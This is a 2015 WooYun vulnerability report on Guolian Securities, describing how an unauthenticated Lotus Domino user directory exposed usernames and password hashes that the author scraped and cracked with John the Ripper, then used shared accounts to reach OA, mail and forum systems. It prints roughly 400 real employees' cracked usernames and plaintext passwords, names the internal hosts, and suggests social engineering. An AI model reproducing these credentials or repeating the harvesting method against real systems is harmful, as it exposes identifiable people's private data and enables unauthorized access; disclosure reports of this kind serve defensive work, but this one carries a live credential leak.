国联证券某漏洞可破解大量账号登录多个系统

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159035

漏洞标题：国联证券某漏洞可破解大量账号登录多个系统

漏洞作者： ucifer

提交时间：2015-12-07 14:54

修复时间：2016-01-21 15:20

公开时间：2016-01-21 15:20

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-07：细节已通知厂商并且等待厂商处理中
2015-12-07：厂商已经确认，细节仅向厂商公开
2015-12-17：细节向核心白帽子及相关领域专家公开
2015-12-27：细节向普通白帽子公开
2016-01-06：细节向实习白帽子公开
2016-01-21：细节向公众公开

简要描述：

口令问题，未授权问题，账号通用问题等N多问题。

详细说明：

http://mail2.glsc.com.cn:8093/stcenter.nsf
这里没有验证码限制，所以还是可以根据弱口令爆破很多账号。
这是密码为123456的账号.

此处还有个未授权漏洞，之前有白帽子提过..
http://mail2.glsc.com.cn:8084/names.nsf/$users

这个表格的字段ShortName和HTTPPassword分别是用户名和hash。

所以写个脚本抓取所有页面的这两个字段的数据,整理成为下面的格式

然后丢入john去破解...

ShenZ:148501
bwang:123456
caiyl:caiyl8
caol:1qaz2wsx
chaixm2:888888
chenaw:chenaw
chenb:168168
chench:999999
chenfeng:a
chenghl1:112358
chenkp:888888
chenl1:888888
chenmeng:chenmeng
chenq1:888888
chenql1:a
chensx:123456
chentl:888888
chenty:a
chenww2:117225
chenwz:654321
chenxf:123456
chenxn:a
chenxuey:191928
chenyamin:a
chenym:chenym
chenyu:147258
chenzy1:a
chenzy:chenzy888
chult:196671
chuxy:110119
chxj:ccccc
cuimm:135616
daiz:a
daizhen:168168
dangwei:a
dengguanglei1:a
dengmy2:888888
dengmy:a
dh:a
dingying:999999
dingyj:123123
emonitor1:123456
emonitor2:123456
fanjw:130139
fanxy:a
fany1:a
fany:a
fanyh:8899
fenghj:123456
fengk:123456
fengkj:888
fengw:a
fengxc:a
fengyf:a
fuwutai:Abcd1234
gaof1:a
gaojy2:888888
gaolin:a
genghr:198891
gengsf1:a
gengsf:176537
gengzc:password
glfc:a
gloud2:123123
gloud3:123123
glqhdnb:a
glqhservice:a
glqhyf1:123456
gonghui:a
gucq:888888
guoh:999999
guoj1:a
guoy:110119
gxzjj:gxzjj
hangf1:8
hangjk:a
hanjp:a
hef:a
hejianghao:a
houj:gl123
houwr:124425
houyt:999999
huasj:a
huawr1:abc123
huawr2:102501
huawr:102501
huaww:a
huiy:142857
huoyq:123456
huxw:a
huyangl:888888
info-glcmc:194806
jial:123456
jiangaz2:888888
jiangjm:shandan
jiangl:999999
jianglj:123123
jiangq:Asdf1234
jiangs:abcd1234
jiangym:a
jiangzj:a
jiaojw:a
jiaoxp:666666
jil:654321
jilei:a
jingj:a
kxfzg:a
lianghf:102921
liangly:a
libo:abcd1234
lic:tracy1
lichenjie:135246
ligm:a
lij1:a
lij2:888888
lijf:a
liliang:198610
limd:123456789
linfy:linfy
linsg1:a
liq1:a
liqian:a
liucq:a
liudef:a
liuhuan:liuhuan2
liuhx:168000
liupf:140630
liusr:123qwe
liuxh:a
liuy1:a
liuz1:a
liwen:a
lixinr:123123
lixn1:a
lixn:a
liyj:107108
liyq:a
liyue:liyue888
lizh:lizh8888
lizhen:199175
lubin:888888
lucx:abc123
lujn:199115
lujw:153201
lulh:a
lumin:a123456
lumj:888888
luqx:123456
lus:000000
luyj:a
luyq:888888
luzk:abcd1234
lvzl:130133
maols:a
maoyf:a
maty1:123123
meix:888888
mengdb:a
nil:19740124
nilj:a
niy:101010
panbb:12345
panq:abcd1234
panyj:123123
pengyb:pengyb123
pexx:a
qiangq:a
qiank:888888
qingsx:a
qinsx:a
qiusy:a
qiuyw:a
qjj:a
qszy:123456
quey:quey1962
quxl:a
reng:a
renzx:renzx123456
rongxh:a
sbp:a
shanxy1:888888
shaoh:a
shaolin:198900
shaoxq:666666
shaoyl:hello
shaql:139120
shenc:sc1106
sheng:171717
shenjie:121212
shenlj:198712
shenm:a
sheny1:a
shenyg:123123
shenyq:a
shenyz:a
shenz1:a
shenzy:123123
shish:a
shixj:a
shixr:a
songjy1:a
songwj:a
songy:a
sunbin:123456
sundf:a
sunmx:888888
suw:110110
szkf:888888
szyyb:a
tangj:666666
tangtl:a
tangxf:a
tangxl2:a
tangzh:abcd1234
tanyz:a
taocl:taocl
taomy:888888
tengyh:a
tongbz:888888
wablkf:a
wangaj:a
wangbing:133976
wangchunxiang:111111
wangcong:wangcong
wangf1:a
wangfj:888888
wanggf:a
wanghm2:a
wanghm:a
wangj1:wangj
wangjf:a
wangjie:a123456
wangjj:a
wangk:888888
wangq:wangq
wangquan:wq111
wangqx:121800
wangqy:a
wangsy:000000
wangt:password
wangty:a
wangwx:a
wangxinyi:wangxinyi&
wangxm:123abc
wangxp1:a
wangxp:a
wangxy1:a
wangxy2:888888
wangy2:888888
wangye:abcd1234
wangyf:a
wangyuan:a
wanj:a
wchao:abcde
wj:12345678
wll:101089
wugp:a
wulei:a
wuting:wuting1989
wuxh1:a
wuxh2:a
wuxilhdb:a
wuxj:abcd1234
wuxq:888
wuy1:a
wuyp:a
wuyq:a
wxj:wxj888
wxliq1631:a
xiangy:a
xiaow1:180783
xiat:198706
xiecy:a
xiefang:123654
xinc2:888888
xinc:a
xixj2:a
xqdj:a
xqdjjyb:a
xuc:111111
xucf1:a
xucj:a
xudh:a
xuefy:a
xuej:111111
xuemj:a
xuet:a
xuex2:a
xuexl1:888888
xuezy:888888
xufl:123789
xug:xug123456
xugj:a
xuht:a
xujc:a
xujian1:a
xujie:888888
xujx:a
xuke:xuke1990
xumx:zxcvbnm
xumz:654321
xuwb1:888888
xuxf:a
xuyaqi:a
xuyd1:888888
xuyd2:a
xuyid1:a
yangf2:a
yangfang:a
yanghq:a
yangj1:yangj
yangjie:12173
yangjingyue:a
yangjy1:a
yangkq:a
yangro:123321
yangrq:198474
yangwz:a
yangyj:198789
yanhm:similar
yantd:a
yanting:a
yaozy1:a
yaozy1:a
yingxw:aaaaa
yuanf:a
yuanlj:888888
yuanlp:a
yubin:123456
yud:999999
yudd:a
yuj:147258
yuk:a
yuliting:a
yury1:yury
yutq:11111
yuziyue:yuziyue1993
yyue:888888
zh_yu_801:a
zhangcx:a
zhangcy:zhangcy
zhangh1:a
zhanghao:888888
zhanghx:a
zhangjf:888888
zhangjie:444444
zhangjunl:123123
zhangjw:a
zhangl1:a
zhangn:123123
zhangsj:a
zhangw1:147369
zhangxc:198511
zhangxin:0123456
zhangxm1:a
zhangym:888888
zhangyu1:a
zhangyu:198308
zhangyunyx:888888
zhangzj:abcd1234
zhaoh:a
zhaojiong:132153
zhaoxl:a
zhaoy:legend
zhengpx:a
zhongtai:zhongtai123
zhongwy:198468
zhoujj:a123456
zhoulian:777777
zhounx:a
zhoupq1:zhoupq
zhouq1:a
zhouqin:114123
zhouwh:abcd1234
zhouwp1:a
zhouwp:888888
zhoux1:a
zhouxb:zhouxb
zhouxj:a
zhouyue:a
zhubc:181818
zhuc2:888888
zhucx1:abc123
zhudx:a
zhuf:a
zhul1:a
zhutt:zhutt
zhuwb1:a
zhuwg:a
zhuxj:a
zhuxl:888888
zhuxm1:a
zhuyy:a
zhuzn:zhuzn123456
zhuzx:a
zly:a
zouhz:888888
zouj:5104
zoul1:a
zqian:888888

前面是用户名后面是密码。。破解出400多，大约公司三分之一的员工账号。。
而员工账号通用问题一直没有解决，所以可以登录OA，邮箱,论坛等系统....
抽取几个账号来尝试登录
http://newoa.glsc.com.cn:8082/ OA系统

邮箱系统的链接可以在OA页面里找到

http://bbs2.glsc.com.cn:8088/glscbbs/ 论坛系统

http://help.glsc.com.cn 在这个链接中有这么一个地方

然后我本地下载了之后,发现服务器需要连接8000端口，然后在C段中找到了这个服务器地址。顺利连接。
公司的各阶层。。也是可以私聊的吧，不过没有尝试。

这里就可以进行社工或者什么什么的了。

漏洞证明：

已经证明。。。

修复方案：

未授权问题，爆破问题，账号通用的问题。。额

版权声明：转载请注明来源 ucifer@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-12-07 15:17

厂商回复：

感谢发现

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159035

漏洞标题：国联证券某漏洞可破解大量账号登录多个系统

相关厂商：国联证券

漏洞作者： ucifer

提交时间：2015-12-07 14:54

修复时间：2016-01-21 15:20

公开时间：2016-01-21 15:20

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ucifer@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159035

漏洞标题：国联证券某漏洞可破解大量账号登录多个系统

相关厂商：国联证券

漏洞作者： ucifer

提交时间：2015-12-07 14:54

修复时间：2016-01-21 15:20

公开时间：2016-01-21 15:20

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0159035"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ucifer@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：